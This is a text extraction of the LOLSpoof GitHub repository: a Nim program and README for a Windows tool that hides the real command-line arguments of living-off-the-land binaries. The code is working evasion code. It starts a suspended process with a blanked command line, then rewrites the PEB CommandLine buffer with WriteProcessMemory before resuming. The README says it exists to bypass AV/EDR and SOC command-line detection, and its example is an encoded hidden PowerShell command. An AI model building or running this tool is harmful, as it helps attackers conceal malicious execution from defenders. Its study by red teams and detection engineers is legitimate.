Repository: itaymigdal/LOLSpoof
Branch: main
Commit: ea2f4681253a
Files: 2
Total size: 5.2 KB
Directory structure:
gitextract__jxwzlo4/
├── LOLSpoof.nim
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: LOLSpoof.nim
================================================
import os
import winim
import rdstdin
import strutils
import strformat
const banner = """
_ _____ _ _____ __
| | | _ | | / ___| / _|
| | | | | | | \ `--. _ __ ___ ___ | |_
| | | | | | | `--. \ '_ \ / _ \ / _ \| _|
| |___\ \_/ / |____/\__/ / |_) | (_) | (_) | |
\_____/\___/\_____/\____/| .__/ \___/ \___/|_|
| |
|_|
An interactive shell to spoof some LOLBins
try !help
"""
const help = """
!exit -> Exit
!cls -> Clear the screen
!help -> This help message
"""
const prompt = "[LOLSpoof] > "
proc onexit() {.noconv.} =
quit(0)
proc executeSpoofedLolbin(realCmdlineN: string): bool =
# Create spoodef cmdline
var binary = realCmdlineN.split(" ")[0]
var argsLen = len(realCmdlineN) - len(binary)
var spoofedCmdlineN = binary & ' '.repeat(argsLen)
var realCmdline = newWideCString(realCmdlineN)
var spoofedCmdline = newWideCString(spoofedCmdlineN)
# Create suspended process
var si: STARTUPINFOEX
var pi: PROCESS_INFORMATION
if CreateProcess(
NULL,
spoofedCmdline,
NULL,
NULL,
FALSE,
CREATE_SUSPENDED,
NULL,
NULL,
addr si.StartupInfo,
addr pi
) != TRUE:
return false
# Get remote PEB address
var bi: PROCESS_BASIC_INFORMATION
var ret: DWORD
if NtQueryInformationProcess(
pi.hProcess,
0,
addr bi,
cast[windef.ULONG](sizeof(bi)),
addr ret
) != 0:
return false
# Get RTL_USER_PROCESS_PARAMETERS address
let peb = bi.PebBaseAddress
let processParametersOffset = cast[int](peb) + 0x20
var processParametersAddress: LPVOID
if ReadProcessMemory(pi.hProcess, cast[LPCVOID](processParametersOffset), addr processParametersAddress, 8, NULL) != TRUE:
return false
# Get CommandLine member address
var cmdLineOffset = cast[int](processParametersAddress) + 0x70 + 0x8
var cmdLineAddress: LPVOID
if ReadProcessMemory(pi.hProcess, cast[LPCVOID](cmdLineOffset), addr cmdLineAddress, 8, NULL) != TRUE:
return false
# Change command line
if WriteProcessMemory(
pi.hProcess,
cast[LPVOID](cmdLineAddress),
cast[LPCVOID](realCmdline),
len(realCmdline) * 2,
NULL
) != TRUE:
return false
# Resume process
ResumeThread(pi.hThread)
WaitForSingleObject(pi.hThread, INFINITE)
return true
proc handleSpecialCommand(cmd: string) =
if cmd == "!exit":
onexit()
elif cmd == "!cls":
discard execShellCmd("cls")
elif cmd == "!help":
echo help
else:
echo fmt"Could not parse command: {cmd}"
when isMainModule:
# Handle Ctrl+C
setControlCHook(onexit)
# Print help
echo banner
while true:
# Get and parse command
var cmdline = readLineFromStdin(prompt)
cmdline = cmdline.strip(trailing=false)
if cmdline == "":
continue
# Handle special command
if cmdline.startsWith("!"):
handleSpecialCommand(cmdline)
continue
var cmdlineSeq = cmdline.split(" ")
# Find LOLBin and reconstruct commandline
var binary = findExe(cmdlineSeq[0])
if binary == "":
echo fmt"Could not find binary: {cmdlineSeq[0]}"
continue
cmdlineSeq[0] = binary
cmdline = join(cmdlineSeq, " ")
# Fire in the hole !
if not executeSpoofedLolbin(cmdline):
echo fmt"Could not spoof binary: {cmdlineSeq[0]}"
================================================
FILE: README.md
================================================
# LOLSpoof
LOLSpoof is a an interactive shell program that automatically spoof the command line arguments of the spawned process.
Just call your incriminate-looking command line LOLBin (e.g. `powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....`) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.
> Use only for 64-bit LOLBins
## Why
Process command line is a very monitored telemetry, being thoroughly inspected by AV/EDRs, SOC analysts or threat hunters.
## How
1. Prepares the spoofed command line out of the real one: `lolbin.exe " " * sizeof(real arguments)`
2. Spawns that suspended LOLBin with the spoofed command line
3. Gets the remote PEB address
4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
5. Gets the address of the command line unicode buffer
6. Overrides the fake command line with the real one
7. Resumes the main thread
## Opsec considerations
Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry:
1. Creation of suspended process
2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead)
3. Write to the spawned process with WriteProcessMemory
## Build
Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)
`nimble install winim`
## Known issue
Programs that clear or change the previous printed console messages (such as `timeout.exe 10`) breaks the program. when such commands are employed, you'll need to restart the console.
Don't know how to fix that, open to suggestions.
gitextract__jxwzlo4/ ├── LOLSpoof.nim └── README.md
Condensed preview — 2 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (6K chars).
[
{
"path": "LOLSpoof.nim",
"chars": 3749,
"preview": "import os\nimport winim\nimport rdstdin\nimport strutils\nimport strformat\n\n\nconst banner = \"\"\"\n _ _____ _ _____ "
},
{
"path": "README.md",
"chars": 1614,
"preview": "\n# LOLSpoof\n\nLOLSpoof is a an interactive shell program that automatically spoof the command line arguments of the spawn"
}
]
About this extraction
This page contains the full source code of the itaymigdal/LOLSpoof GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 2 files (5.2 KB), approximately 1.4k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.